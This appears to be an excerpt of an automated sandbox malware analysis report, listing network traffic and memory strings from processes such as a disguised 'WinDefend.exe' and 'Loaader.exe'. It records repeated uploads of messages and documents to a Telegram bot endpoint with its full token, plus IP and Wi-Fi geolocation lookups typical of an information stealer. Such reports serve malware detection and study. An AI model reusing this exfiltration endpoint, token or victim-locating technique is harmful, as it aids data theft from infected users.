Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 208Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e0df5263-6b9a-466f-a257-99d5fc14a0f2"Host: api.telegram.orgContent-Length: 1229Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="578eee22-8a09-41b4-89b2-60ecaf03bffa"Host: api.telegram.orgContent-Length: 934Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="593636b9-6ab3-4b39-b64c-0c606f68b8ae"Host: api.telegram.orgContent-Length: 262934Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 192Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="abd7000b-0fa8-45e1-b558-b29acd39828d"Host: api.telegram.orgContent-Length: 1404Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f8451159-dc44-4a7a-aa25-3a00ea09d03e"Host: api.telegram.orgContent-Length: 600Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7e71501f-f78e-4e8b-b204-7cf7606d7793"Host: api.telegram.orgContent-Length: 42190Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 196Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="1f289f73-e1c8-4805-a304-af7c9691fe3d"Host: api.telegram.orgContent-Length: 1548Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="d80e067b-6bdb-4762-b126-95d60933b193"Host: api.telegram.orgContent-Length: 893Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api64.ipify.org
Source: unknown	DNS query: name: api64.ipify.org
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown

HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.5:61173 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com

Source: global traffic	DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 81.189.14.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org

Source: unknown

HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 493Expect: 100-continueConnection: Keep-Alive

Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.org
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org0
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: WinDefend.exe, 00000004.00000002.3430651015.000000000B845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000030.00000002.2300634583.0000013E8BBD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: 77EC63BDA74BD0D0E0426DC8F80085060.21.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Loader.exe, 00000014.00000002.2747981173.000000001B58A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab/
Source: Loaader.exe, 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab6
Source: Loaader.exe, 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en89n
Source: Loader.exe, 00000014.00000002.2521881734.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ene089
Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000032B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: Loaader.exe, 00000015.00000002.3282228143.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: Loaader.exe, 00000015.00000002.3282228143.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000019.00000002.2776917070.0000015CD05B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2776917070.0000015CD06F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19F09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19DC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DB9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2527964251.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2270356962.0000015CC054B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019133BD1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A09D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8D9E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.30.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000030.00000002.3074256391.0000013EA5BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000019.00000002.2270356962.0000015CC054B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019133BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A09D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8D9E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikPX
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031AB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031AB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.p
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003522000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003549000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDoc
Source: WinDefend.exe, 00000004.00000002.3288846438.000000000324E000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003045000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003076000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000030C6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003018000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003549000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003208000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003098000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003064000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003034000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EDF000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocumentT
